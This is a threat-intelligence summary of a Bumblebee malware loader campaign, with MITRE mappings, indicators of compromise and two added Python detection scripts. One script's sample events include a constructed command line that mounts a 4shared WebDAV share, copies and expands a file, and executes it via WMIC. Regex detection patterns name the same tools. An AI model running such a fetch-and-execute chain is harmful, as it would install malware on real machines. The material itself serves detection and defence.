Bumblebee loader has resurfaced with new evasion and distribution techniques, including a domain-generation algorithm (DGA) for C2 and WebDAV-based delivery via 4shared. The campaign shows attackers leveraging 4shared WebDAV, LNK/ZIP attachments, and varied execution paths to complicate detection and takedowns.
Read more: #Bumblebee #WebDAV #DGA #4shared #Conti #Akira
Keypoints
- The Bumblebee malware loader has reappeared after a hiatus and is linked to ransomware-affiliated threat actors, including those historically associated with Conti and Trickbot.
- Updates include reduced dependency on hard-coded C2s and the adoption of a Domain Generation Algorithm (DGA) for dynamic C2 reachability.
- A new distribution vector uses WebDAV via 4shared, with malicious spam emails delivering .LNK and .ZIP attachments that trigger Bumblebee download.
- Observed command sequences include mounting WebDAV shares, expanding or copying files, and using WMIC, conhost.exe, or schtasks to execute payloads.
- The campaign shows improved evasion and the use of legitimate services to make the infrastructure harder to block or take down, suggesting the operators refined their tooling during the summer pause.
- Defenders are advised to block webdav.4shared[dot]com and the DGA-generated .life domains listed under Indicators of Compromise below, and to monitor for the LNK-related command activity described above (WebDAV mounts followed by expand/copy and WMIC, conhost.exe or schtasks execution).
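The key points above describe the delivery chain (LNK opens the command processor, which mounts a 4shared WebDAV share, stages a file with expand/copy, and executes it via WMIC, conhost.exe or schtasks) and recommend monitoring for it. The following is an added detection example, not code from the page or from Intel471: it runs over constructed process-creation events in the shape of Sysmon Event ID 1 and flags command lines that chain a WebDAV mount with staging or execution. The sample command lines, the `%TEMP%` paths and the severity scheme are constructed for illustration; only the WebDAV host and the LNK filename pattern come from the page (the filename regex is the page's pattern with the parentheses and dot escaped so they match literally).

```python
"""Endpoint-side detection for the LNK -> WebDAV (4shared) -> execute chain.

Added example, not code from the page or from Intel471. The events below are
constructed samples imitating Sysmon Event ID 1 fields, not real telemetry.
"""
import re

# Filename pattern from the page's IoC list, with "(" ")" and "." escaped so
# they match literally, e.g. scan-document_2023(383).lnk
LNK_NAME_RE = re.compile(r"^[a-z]+-[0-9a-z]+_2023\([0-9]{3}\)\.lnk$", re.IGNORECASE)

# Command-line indicators grouped by stage as (tag, regex). The WebDAV host is
# the one named on the page; the staging/execution patterns are generic
# LOLBin checks for the steps the key points describe.
INDICATORS = {
    "mount": [
        ("webdav_4shared", re.compile(r"webdav\.4shared\.com", re.I)),
        ("net_use_webdav", re.compile(r"\bnet\s+use\b.*(@SSL|DavWWWRoot|https?://)", re.I)),
    ],
    "stage": [
        ("expand", re.compile(r"\bexpand(\.exe)?\s", re.I)),
        ("copy", re.compile(r"\bcopy\s", re.I)),
    ],
    "execute": [
        ("wmic_create", re.compile(r"\bwmic(\.exe)?\b.*process\s+call\s+create", re.I)),
        ("schtasks", re.compile(r"\bschtasks(\.exe)?\b", re.I)),
        ("conhost", re.compile(r"\bconhost(\.exe)?\b", re.I)),
    ],
}

# Constructed sample events (not real telemetry). ws01 has the shape of the
# chain described on the page; ws02 is a benign corporate WebDAV mapping;
# ws03 is an ordinary copy with no WebDAV activity.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": (r"cmd.exe /c net use \\webdav.4shared.com@SSL\DavWWWRoot /user:u p "
                      r"& copy \\webdav.4shared.com@SSL\DavWWWRoot\stage.dat %TEMP%\s.dat "
                      r"& expand %TEMP%\s.dat %TEMP%\s.exe "
                      r"& wmic process call create %TEMP%\s.exe")},
    {"host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c net use Z: \\files.corp.example\DavWWWRoot\share"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c copy C:\reports\a.txt C:\reports\b.txt"},
]


def lnk_name_suspicious(name: str) -> bool:
    """True if an attachment name matches the campaign's LNK naming pattern."""
    return LNK_NAME_RE.match(name) is not None


def match_stages(command_line: str) -> dict:
    """Return {stage: [tags]} for every indicator the command line hits."""
    hits = {}
    for stage, patterns in INDICATORS.items():
        tags = [tag for tag, rx in patterns if rx.search(command_line)]
        if tags:
            hits[stage] = tags
    return hits


def detect(events: list) -> list:
    """Flag events whose command line mounts a WebDAV share.

    Mount plus staging or execution in the same command line is reported as
    high severity (the full chain); a lone mount is reported as medium so an
    analyst can still pivot on the WebDAV host.
    """
    alerts = []
    for ev in events:
        hits = match_stages(ev["command_line"])
        if "mount" not in hits:
            continue
        chained = "stage" in hits or "execute" in hits
        alerts.append({
            "host": ev["host"],
            "parent": ev["parent_image"],
            "image": ev["image"],
            "severity": "high" if chained else "medium",
            "stages": hits,
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["host"], a["stages"])
```

Pairing the command-line rule with the filename rule (`lnk_name_suspicious` on mail-gateway attachment names) gives two independent detection points; the benign ws02 event shows why a bare `net use` against a WebDAV path should be triaged rather than auto-blocked.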
MITRE Techniques
- [T1566] Phishing – Adversaries conduct mass malware spam campaigns to infect end users and increase botnet size.
- [T1204.001] User Execution: Malicious Link – Spam operations rely on a user clicking a malicious link to gain execution.
- [T1204.002] User Execution: Malicious File – The attached .LNK file initiates the Windows command processor, which then executes a preconfigured set of commands.
- [T1053.005] Scheduled Task/Job: Scheduled Task – Adversaries use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence.
- [T1568.002] Dynamic Resolution: Domain Generation Algorithms – DGAs generate destination domains for C2 traffic dynamically. ‘Using a 64-bit static seed value, the DGA generated 100 new domains with a “.life” top-level domain (TLD). When the payload is executed, Bumblebee will iterate until it resolves a DGA domain to an IP address and successfully checks in.’
- [T1571] Non-Standard Port – The malware uses raw sockets and communicates over TCP port 443, the port normally associated with HTTPS, using its own protocol rather than HTTPS; the protocol/port mismatch is what makes this a non-standard-port technique.
- [T1573.001] Encrypted Channel: Symmetric Cryptography – Adversaries employ a known symmetric encryption algorithm to conceal C2 traffic.
- [T1573.002] Encrypted Channel: Asymmetric Cryptography – Adversaries employ a known asymmetric encryption algorithm to conceal C2 traffic.
- [T1132] Data Encoding – Adversaries encode data to make the content of C2 traffic more difficult to detect.
- [T1001] Data Obfuscation – Adversaries obfuscate C2 traffic to make it more difficult to detect.
- [T1020] Automated Exfiltration – Adversaries exfiltrate data, such as sensitive documents, through automated processing after it is gathered during collection.
- [T1041] Exfiltration Over C2 Channel – Adversaries steal data by exfiltrating it over the existing C2 channel.
- [T1608.001] Stage Capabilities: Upload Malware – Adversaries upload malware to third-party or adversary-controlled infrastructure to leverage it during operations.
- [T1608.002] Stage Capabilities: Upload Tool – Adversaries upload tools to third-party or adversary-controlled infrastructure to leverage it during operations.
- [T1592.004] Gather Victim Host Information: Client Configurations – The malware collects the compromised host's configuration, which may include operating system or version, virtualization, architecture, language and/or time zone.
- [T1587.001] Develop Capabilities: Malware – Adversaries develop malware to support and enhance their operations.
- [T1588.001] Obtain Capabilities: Malware – Adversaries purchase malware from third parties to enhance their operations.
- [T1588.002] Obtain Capabilities: Tool – Adversaries purchase, or acquire stolen licenses for, legitimate tools that are abused during their operations.
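The T1568.002 entry above describes the check-in behaviour: the loader iterates through seeded .life domains until one resolves. That leaves a network-side signature independent of the generator itself: a host that looks up a burst of short, random-looking .life names, mostly answered NXDOMAIN, with one eventual NOERROR. The following is an added detection example, not code from the page or from Intel471, run over constructed DNS query-log lines. The page does not document the generator, so the "11 lowercase alphanumerics under .life" shape is a heuristic derived from the four listed domains, not the algorithm; the log format, client addresses and the `min_distinct` threshold are also assumptions.

```python
"""DNS-side detection for DGA-based C2 discovery.

Added example, not code from the page or from Intel471. It scans DNS query
logs for clients that cycle through many DGA-shaped ".life" names (mostly
NXDOMAIN) until one resolves. The log lines are constructed samples.
"""
import re
from collections import defaultdict

# Known DGA domains from the page's IoC section, lowercased
# (DNS names are case-insensitive).
KNOWN_DGA_DOMAINS = {
    "3v1n35i5kwx.life", "cmid1s1zeiu.life", "itszko2ot5u.life", "newdnq1xnl9.life",
}

# Shape heuristic (assumption): each listed domain is 11 lowercase
# alphanumerics under .life. The page does not document the generator.
DGA_SHAPE_RE = re.compile(r"^[a-z0-9]{11}\.life$")

# Constructed log lines (not real traffic): "<timestamp> <client-ip> <qname> <rcode>"
# 10.0.0.5 shows the iterate-until-resolves pattern; 10.0.0.7 is benign
# (a normal site and a legitimately named .life domain); 10.0.0.9 makes a
# single DGA-shaped lookup, below the default threshold.
SAMPLE_DNS_LOG = """\
2023-09-07T10:00:01Z 10.0.0.5 3v1n35i5kwx.life NXDOMAIN
2023-09-07T10:00:01Z 10.0.0.5 cmid1s1zeiu.life NXDOMAIN
2023-09-07T10:00:02Z 10.0.0.5 itszko2ot5u.life NXDOMAIN
2023-09-07T10:00:02Z 10.0.0.5 newdnq1xnl9.life NOERROR
2023-09-07T10:00:05Z 10.0.0.7 www.example.com NOERROR
2023-09-07T10:00:06Z 10.0.0.7 mycompany.life NOERROR
2023-09-07T10:00:09Z 10.0.0.9 q7r8s9t0u1v.life NXDOMAIN
"""


def parse_dns_line(line: str):
    """Split one log line into (client, qname, rcode); None if malformed."""
    parts = line.split()
    if len(parts) != 4:
        return None
    _ts, client, qname, rcode = parts
    return client, qname.lower().rstrip("."), rcode.upper()


def analyze_dns(log_text: str, min_distinct: int = 3) -> dict:
    """Return {client: finding} for clients showing DGA-style lookups.

    A client is flagged when it queried at least `min_distinct` distinct
    DGA-shaped .life names, or any name on the known IoC list. `resolved`
    lists the candidate names that returned NOERROR: under the
    iterate-until-resolves pattern that is the live C2 domain to block first.
    """
    per_client = defaultdict(lambda: {"candidates": set(), "nxdomain": 0,
                                      "known": set(), "resolved": []})
    for raw in log_text.splitlines():
        parsed = parse_dns_line(raw)
        if parsed is None:
            continue
        client, qname, rcode = parsed
        shaped = DGA_SHAPE_RE.match(qname) is not None
        known = qname in KNOWN_DGA_DOMAINS
        if not (shaped or known):
            continue
        st = per_client[client]
        st["candidates"].add(qname)
        if known:
            st["known"].add(qname)
        if rcode == "NXDOMAIN":
            st["nxdomain"] += 1
        elif rcode == "NOERROR":
            st["resolved"].append(qname)

    findings = {}
    for client, st in per_client.items():
        if len(st["candidates"]) >= min_distinct or st["known"]:
            findings[client] = {
                "distinct_dga_shaped": len(st["candidates"]),
                "nxdomain": st["nxdomain"],
                "known_ioc_hits": sorted(st["known"]),
                "resolved": st["resolved"],
            }
    return findings


if __name__ == "__main__":
    for client, finding in analyze_dns(SAMPLE_DNS_LOG).items():
        print(client, finding)
```

The threshold matters more than the IoC list: the page notes the DGA yields 100 domains per seed, so the four listed names cover only a fraction, while the NXDOMAIN-burst-then-resolve shape holds for every seed. Tune `min_distinct` against your resolver's baseline before alerting on it.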
Indicators of Compromise
- [Domain] – webdav.4shared[dot]com, 3v1n35i5kwx[dot]life, cmid1s1zeiu[dot]life, Itszko2ot5u[dot]life, newdnq1xnl9[dot]life
- [URL] – https://webdav.4shared[dot]com
- [File Name] – scan-document_2023(383).lnk, notify-september_2023(309).lnk
- [File Name] – document-07september_2023(341).lnk, invoice-07september_2023(231).lnk
- [Regex] – [a-z]+-[0-9a-z]+_2023\([0-9]{3}\)\.lnk, [0-9]{2,3}\.lnk (parentheses and dots escaped to match literally; the second quantifier was written {2-3}, which is not valid regex syntax)
Read more: https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign